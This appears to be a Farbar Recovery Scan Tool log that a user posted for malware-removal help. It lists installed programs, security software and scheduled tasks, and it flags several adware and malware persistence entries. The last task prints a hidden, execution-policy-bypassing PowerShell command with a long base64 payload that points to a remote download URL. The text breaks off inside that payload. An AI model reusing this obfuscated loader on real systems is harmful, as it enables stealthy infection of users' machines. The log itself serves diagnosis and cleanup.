2015-12-28 23:01 - 2015-12-28 23:02 - 0001282 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.boostrap.log
2015-12-28 23:01 - 2015-12-28 23:02 - 0005761 _____ () C:\Users\hersheychoco9\AppData\Roaming\Bubble Dock.installation.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\Selection Tools.installation.log
2015-12-28 23:01 - 2015-12-28 23:01 - 0000097 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.boostrap.log
2015-12-28 23:02 - 2015-12-28 23:02 - 0000078 _____ () C:\Users\hersheychoco9\AppData\Roaming\WindApp.installation.log
2015-12-28 22:57 - 2015-12-28 22:57 - 0009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
2015-04-08 10:52 - 2015-04-08 10:52 - 0002493 _____ () C:\Users\hersheychoco9\AppData\Local\recently-used.xbel
2015-12-28 22:57 - 2015-12-28 22:57 - 0002560 _____ () C:\Users\hersheychoco9\AppData\Local\uninstall.exe
2014-05-13 21:05 - 2014-05-13 21:05 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-12-28 23:16 - 2015-12-28 23:16 - 0001520 _____ () C:\ProgramData\tempimage.bmp

==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-12-20 22:31

==================== End of FRST.txt ============================

 

[hersheychoco]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by hersheychoco9 (2016-01-05 17:09:21)
Running from D:\Utilities
Windows 8.1 (X64) (2014-05-14 03:51:59)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1030869394-3123877279-975090705-500 - Administrator - Disabled) => C:\Users\Administrator
Guest (S-1-5-21-1030869394-3123877279-975090705-501 - Limited - Disabled)
hersheychoco9 (S-1-5-21-1030869394-3123877279-975090705-1001 - Administrator - Enabled) => C:\Users\hersheychoco9

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Roboscan (Enabled - Up to date) {9D201895-DDC4-8A80-AD2D-06BCC9382E61}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Roboscan (Enabled - Up to date) {2641F971-FBFE-850E-979D-3DCEB2BF64DC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Roboscan (Enabled) {A51B99B0-97AB-8BD8-8672-AF8937EB691A}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.3.0.151 - Adobe Systems Incorporated)
Adobe Flash Professional CC 2015 (HKLM-x32\...\{31390329-FFF0-11E4-85AD-AF2C4143F080}) (Version: 15.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 11 (HKLM-x32\...\Adobe Photoshop Elements 11) (Version: 11.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aliens versus Predator Classic 2000 (HKLM-x32\...\Steam App 3730) (Version: - Rebellion)
Autodesk SketchBookExpress 2010 R1 (HKLM-x32\...\{426187BC-F500-4208-B3C1-96876EE7FA31}) (Version: 4.12.0001 - Autodesk)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version: - Ronimo Games)
Borderlands 2 (HKLM-x32\...\Steam App 49520) (Version: - Gearbox Software)
Castle Crashers (HKLM-x32\...\Steam App 204360) (Version: - The Behemoth)
Color Efex Pro 3.0 Wacom Edition 6 (HKLM-x32\...\Color Efex Pro 3.0 Wacom Edition 6 Stand-Alone) (Version: 3.1.1.1 - Nik Software, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version: - Valve)
Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve)
Curse (HKLM-x32\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 6.0.0.0 - Curse)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.7.5.63 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D850CB7E-72BC-4510-BA4F-48932BFAB295}) (Version: 2.9.901.0 - Dell Products, LP)
Dell Product Registration (HKLM-x32\...\{764E68FE-C2F9-410E-90A8-CE7F8B9A36E2}) (Version: 2.03.0204 - Aviata Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.1.6664.93 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 18.0.5.4 - Synaptics Incorporated)
Dell Update (HKLM-x32\...\{C87ADBDA-EF36-4A53-B05C-DBCD98D3A2CA}) (Version: 1.4.2000.0 - Dell Inc.)
Don't Starve Together Beta (HKLM-x32\...\Steam App 322330) (Version: - Klei Entertainment)
Dragon Nest (HKLM-x32\...\Steam App 11610) (Version: - Eyedentity Games Inc.)
Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
ffdshow [rev 3154] [2009-12-09] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
Game Booster 3 (HKLM-x32\...\Game Booster_is1) (Version: 3.5 - IObit)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version: - Facepunch Studios)
GIMP 2.8.14 (HKLM\...\GIMP-2_is1) (Version: 2.8.14 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\Steam App 239070) (Version: - Crackshell)
Hero Siege (HKLM-x32\...\Steam App 269210) (Version: - Elias Viglione)
How to Survive (HKLM-x32\...\Steam App 250400) (Version: - )
Insurgency (HKLM-x32\...\Steam App 222880) (Version: - New World Interactive)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.22.1760 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1342.2) (HKLM\...\{302600C1-6BDF-4FD1-1311-148929CC1385}) (Version: 3.1.1311.0402 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.2.1000 - Intel Corporation)
Intel® PROSet/Wireless Software (HKLM-x32\...\{6882ac6d-e97d-4e25-b3ea-5f3f21055dfe}) (Version: 16.6.0 - Intel Corporation)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 4.3.0.5 - IObit)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Killing Floor (HKLM-x32\...\Steam App 1250) (Version: - Tripwire Interactive)
Killing Floor 2 (HKLM-x32\...\Steam App 232090) (Version: - Tripwire Interactive)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Life Is Strange™ (HKLM-x32\...\Steam App 319630) (Version: - DONTNOD Entertainment)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
My Game Long Name (HKLM\...\UDK-cf0a7b04-8d44-4d89-bebf-60876b806bed) (Version: - Epic Games, Inc.)
Nicole (otome version) (HKLM-x32\...\Steam App 307190) (Version: - Winter Wolves)
NVIDIA PhysX (HKLM-x32\...\{B455E95A-B804-439F-B533-336B1635AE97}) (Version: 9.14.0702 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version: - )
Outlast (HKLM-x32\...\Steam App 238320) (Version: - Red Barrels)
PAYDAY 2 (HKLM-x32\...\Steam App 218620) (Version: - OVERKILL - a Starbreeze Studio.)
Pool Component (HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\{D8814471-E92F-6B47-10E9-0AD81C4D3361}) (Version: 1.6.5 - Beach Download corp) <==== ATTENTION
PSE11 STI Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Quickset64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 10.16.007 - Dell Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7152 - Realtek Semiconductor Corp.)
Risk of Rain (HKLM-x32\...\Steam App 248820) (Version: - )
Roboscan Internet Security (HKLM\...\Roboscan_is1) (Version: v2.5 - Roboscan Inc.)
Scribblenauts Unlimited (HKLM-x32\...\Steam App 218680) (Version: - 5th Cell Media)
SdRt4200 (HKLM-x32\...\{140347A0-4A0C-44FC-9CA1-C8A3471899B7}) (Version: 4.2.8.0 - パルティオソフト株式会社)
Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - ) <==== ATTENTION
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.5.0.9082 - Microsoft Corporation)
Skype™ 7.17 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.17.105 - Skype Technologies S.A.)
Star Wars Jedi Knight: Jedi Academy (HKLM-x32\...\Steam App 6020) (Version: - Raven Software)
Starbound (HKLM-x32\...\Steam App 211820) (Version: - )
State of Decay (HKLM-x32\...\Steam App 241540) (Version: - Undead Labs)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version: - CD PROJEKT RED)
TOXIKK (HKLM-x32\...\Steam App 324810) (Version: - Reakktor Studios)
Unturned (HKLM-x32\...\Steam App 304930) (Version: - Nelson Sexton)
Update for Japanese Microsoft IME Postal Code Dictionary (HKLM-x32\...\{15015752-9990-4516-A2B1-93823281FB8E}) (Version: 15.0.1759 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Dictionary (HKLM-x32\...\{E75B82FD-B6FD-4653-8685-F3A97BDFEA6E}) (Version: 15.0.2013 - Microsoft Corporation)
Update for Japanese Microsoft IME Standard Extended Dictionary (HKLM-x32\...\{01E87699-A49D-413A-B75B-7C434FEF979C}) (Version: 15.0.2013 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.1 - VideoLAN)
Vuze (HKLM\...\8461-7759-5462-8226) (Version: 5.5.0.0 - Azureus Software, Inc.)
Wacom (HKLM\...\Pen Tablet Driver) (Version: 5.3.5-3 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
Wondershare MobileGo ( Version 8.0.0 ) (HKLM-x32\...\{1E04C795-7359-4E05-8A0E-5644F777AA09}_is1) (Version: 8.0.0 - Wondershare)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1030869394-3123877279-975090705-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

 

[hersheychoco]

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {12359E8D-4BF8-4EEF-8EF1-AF0A806E5D27} - System32\Tasks\Pool Component => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll",#1 <==== ATTENTION
Task: {1942C491-20D1-442F-BC74-6769F1D1280D} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
Task: {1D1D0A16-ADA3-40B5-A257-8E6A372FF7F1} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-hershey99999@gmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2015-09-04] (Adobe Systems Incorporated)
Task: {32CB8F3D-72E2-4F26-AF79-830A7A116864} - System32\Tasks\Easy Driver Pro Schedule => C:\Program Files (x86)\Probit Software\Easy Driver Pro\EDPTray.exe
Task: {3855C92B-1AB9-4877-B728-3E166A322521} - System32\Tasks\Genius_Interval => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] ()
Task: {53C1C984-FAFA-45AF-A299-CC9D47FF50FC} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\Dell\SupportAssist\sessionchecker.exe [2015-10-29] (PC-Doctor, Inc.)
Task: {63B79E46-FBBD-4C8A-B7AA-45C6731402FF} - System32\Tasks\IBUpd2 => C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe [2015-12-22] ()
Task: {642B9DD6-2DA0-4C37-82B8-2B043D8E899E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {75F57505-E997-49EF-8280-CBEDA94B26CE} - System32\Tasks\Seventh => C:\Users\hersheychoco9\AppData\Roaming\Seventh\Seventh.exe <==== ATTENTION
Task: {7AF5A5D6-6314-46CE-A436-82522A94B518} - System32\Tasks\CCleanerSkipUAC => C:\Users\hersheychoco9\Desktop\Utilities\CCleaner\CCleaner.exe [2015-07-17] (Piriform Ltd)
Task: {7BC0E46C-BFEC-438E-AFA4-ECE363145385} - System32\Tasks\Game_Booster_AutoUpdate => C:\Program Files (x86)\IObit\Game Booster 3\AutoUpdate.exe [2015-11-07] ()
Task: {80113A5B-9EE2-4DF6-A1E6-7ED2A1C45754} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-31] (Google Inc.)
Task: {80FA20B2-A979-4EAB-9EBA-6D46F57955A1} - System32\Tasks\Genius => C:\Users\hersheychoco9\AppData\Roaming\Genius\Genius.exe [2015-12-10] () <==== ATTENTION
Task: {82DB69B4-7124-4705-AFC2-219F5EBB3241} - System32\Tasks\{0F0F7D47-7E08-7D0B-7811-7D0C050B110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADYATwBXAEQAegBmAFIAVwBLAEgALQBoAHYANAB1AC0ALQBEADQAUABHAEgAaQBwAF8ANQBWAEUATQBRAHAAegAwAEIASQA0AGwARwBPAHcAMgBuAGMAbQBsAEgAYgBqAGMASgBtAFIAUwBVAE4ATQBOAHcAdwAzAFkAUgBjAFQAWQBTAGwAdwBXAGEAbgBvAGcANgAyAEwAWQBPAEUAUAB1ADMANAA5AE0AaAB4AEsASABvAFcAVABPADkAWgBmAEMAawBJAHkAcQBHAFgAcgB6ADIAUABhAEIAMQBLAFcAaQBkAHYAQwBqAHQAXwBQAEEAOQBYAHEAVgAwAHoAZwAyAHUAVQBJAGcAUgBWAEMAcwByAHEANgA4AEkASAAyAEYAQgA4AGIAWgBUAE4AZgBZAFIAUQBqAHEAYgBHAGYANAB6AGwAOQBjAHUASwBsAEEANQBnAFAALQBnAFMATABKAE4AdQBKAEcAWQBFADkAQQBtAFoAMgBZAG0AWQBTADUAdwB0AEYAZAB1AF8ANABpADIANgBTAGMAQQBUAHcAawBLAFIAWgBKAHIAZABGAE8AWgBoADgARAA2AHkASABMAHQAeQBhAE4ANABBADUAdABqAG0AQQA2AHUAWgBiAGkAcgBmAEsAMgB6AHoAMQBiAEMAeABEAFIAbgA1AEwATgBXAEsANgBKAHEAVABOAFYAbAAzADUATwBwAEEAbwAzADEAaQBqAHEAcgBPAGkAawBPAHcAbgBvAFIATAB6AGQARgBuAE0AQQBrAG8ASQBPAGoATAB2AE8ASgBzADQAVAAtAHgATwA3AE8AZgBvAGwAQgBrAHgAVwB6AEIAWgBpAEMAOABMAFkAagBFADMARAB5AGMARQBIADEAWQAyADIAUwB4AEMAZQBiAHcANgBYAEMAUQAzAGMAWAB5AGIAXwBQAGQAYgAwAFoAUAA1ADEASABKAG4AdQBGAFcAagAwAHoAXwBwAFUAcABsAEQALQBLAFMAbQBoAFkAcQBrAEEAQwBzAEMAQwBZAFUALQBfAEIAYwBjAFkAbQB3AGEAbABuAHYARABRAEMAUABEAC0ARQBVADYARwBUAEUAbgBjAG8AcABmAFAAWQBXAEYAaQBEAG4AVABXADUAZABkAFgAcgA3AFgAcABzADYAQQBmAHkAeABBAFYAZwAwAFIAOQBzAGYAcwBZAHgANABnADkAdAAzAG0AawBrAEkAVQBOAEUAbwBBADEAQQBRADQARQBqAE4ATQAyADEASwBVAEcAUgBaAG8AMQBWAEEAMgBkAHUASABPADUAQwBjADAAOQBuADMAYgBxAHoARABrAG8AVQBIAGYANABxAEgARgBEADEAbQBVAG4ALQBuAEgATABqAG0AbQB6AEwAUwA5AEcATQBwAEEAUwBjAEcAVAB3AHYAaQA5AEwAVwBlADIASwBwADMAegB0AGgASABQAGwAdABiADYAdwBxAF8AdwBTAGsAdABkAFAAYwBTAEsAZAA3AGIAdwBEAGcAbwB0ADIAbAA4AE8AYQB4AFIAYwBWAEcAVwBDAFQAcQAyAGwAMQBwADUATwB4AEcAbgBCAFUATQAxAFIAdQBsAHgAWgBjADYAMQBZAFAARQBnAG4AMAB5AEkAYQB6AEkAVgB6AGYARwBNAC0AagBOAEQAUQBCAE0AdQB3AHAAMgBWAFEAQwB5AE4AOQBHAHoAawBtAG8AeQAyAE0AagAxAEEARABQAHkAYgBUAGwAawBxAFUATAB6AHAAQQBtAGgAZwBuAGwARQA2AFUAOQBWADQAdgB4ADIAUgBHAGoASwBfAFkAUAA4AEcAMwA0AFkANwBoAHcAUQBkAEIAVQBNAFMAQwAyAGYANAAwAGkAeQByAEYANABCADIAMgByAFoAWABoAFQAUgBCAHUAawBwAE0AQwBMAEsAaQBPAGkAagBRAG0AdwBTADMAQwBGAG4AcQBxADUAdAB4AFQAZwB3ADgARQBnAFkANwBUAFgAcwBlAG8AVQBKAHEAUQBtAHoATwBrADEATgBQAHAAVQBsADYAegBkAEUATABLAG8ATgByAHQAWABKAF8AOABtAGEASAAxAHIAMgBNAGEAagBLAFMAcgBJAGsAcQAxAGIANABPAEUAUwBXAHUAawA4AHUAMQBaAHEAQQAxAEwASQBKAHYAYQBqADAAYQBqAHIAVQBFAGYASgB6AGQAUwAtADcAXwB5AFcAMgBfAEgAUwBmAEUAWQB0AG8ANQAyAGQAXwA1AHEAYwBtAHMAegB4AFgAUgBkAFgAOABZAHYAOABIAFAAXwBjAFUALQBTADcAMQBSAEoAZgA0ADIANgA2AEwALQBBAHcAZQBEAE0AMQBrACYAYwA9ADcAaQBlAGgAMwB4AGsAcQB6AEwAUABwAG4AbABrAFoAZgBuAHEANABYADMAOQBoAE4AegAwAHcAdABfAE4AMABPADgAXwAtAHkAdgBDAHAAbwBpAHoANgBXAFcAOABGAEUAdQBvAEkASABZADcAawBqAGgAVgBsAGgASgAtAGwATAAyAHYAUwBtAFcAQQA1AFEAVgAyAG0AUgB5AFMAOABRAEIAeABuAFcAVwByADgAQQBmAGsAXwBXAEUAWQBaAHEASQBvAHkAcQAzAGwAZAByAFYAcQBVAEgAegBzAGgARwBHAHkAdgBsAEUAagA0ADEAMQBXAEoAegBYAFUAYgBDAGEAdgBVAFMAcwBhADUASwBEADMANQBjAHAAdwBBAFUAUgBnAHUAawAzAHIAdgBjAHgANQBJADgAeABSAFMANgBqAGYAZgBLAFcAbwBPADkARAA3ADcAagBfAFMAcwBYAGQAYwBfADUANgBDAEwAUwBZAFYAVwBFAGEAUwBFAFEAVgB4AGsAUABLAHoAUQBIAFkATgBJAHQAcAAzAGoAMABOAGMAUgBIAEEAcABTAEEAbwBwAE0AcwB4AHMASABDAHMAUQAtAFQAbQBjAFMAZQA0AHoAdgBOAFYAagBPAE0AdwA3AHMAdAAwAFAALQBqAEYATwBtAEgASwB4AFUALQBNAG8AdABxAFAASgBnAFgAXwBJADMAVgA2ADYAUwA4AEoAQgBxAEMAbAA1AEMASgB1AHkAYQBNADAAMABaAGIAaABEAEkAMQBfAHkAYgBaAEYASABoAGkAaQB2ADUAQgBuAGYAeABSAFUAYQBhAHQAawBhADEAZQBBAEsATwBfADUAcgBiADEATQBQAFcAdABPADQATABFAFoAbgBoAGgAVgBPADMAVwBmAE8AMQBVAHEANQBhAE0AVQB1AGQAUgBzADIAWABGAEoASgBxAFIATgBjADAAaABLAEwAMAA1AEcAcwBhAHkAcQA3AFEAbwBWAGMAMgBmAGoAMABaAC0AcQBWAG8AawBfADMAYgBGAFkAcgAyAHMAdwBnAHgAbwBiAHEAWgBRAGgAWgBRAG8AbQBWAHAANwA2AHYANgBkAHgAdgBBADIAaQA2AHgAWQBwADIAaQBVAE0AMwB2AFcAbAB2AEoATQBkADMARQBUAFEAOABLADkAYQBSAGoAOQBaADcASwBxAGcAdQBLAGcAawBsAEYAcgByAEsAMgB2AFIAVwB3ADAAUABoAEsASgBiADQAQQBiAG8AcAAyAGkATwBlAHoAdgBqAEMAbgAxAHIAOAA0AEcATwB0AFAARwAtADAATQBSAEYAdgBoAFgAZwBUAGEANQBxAEIATwBuAEYAbQBCAHEAcgBKAFoAaQBmADQAWAA2AFIAbgA1AFcAbQA3ADQAbABuAFIALQBtAGgAagBDAHQAaABGAGoAaQBUAE4AegBJAHkAcwBtADIAbwBHAFIAVgBfAG4AaAA3AGwANgBMAEcASABXAHAASQBUAEwAcABlAGkAUABVAFgAeQBjAGEAWgBCAGoAZQBoAFQAeQBUADIASgA3AHoASwBxAFoAYQBmAG4AMgBoADIASABKAGwAYwBjAFkAdwB3AGIAcQBPADgAUgA0AE4AbgBBAGkAVAB0AHgAWQBXAFYAXwBtAG4AMABXAHQAZQBvAG0ARgBzAEc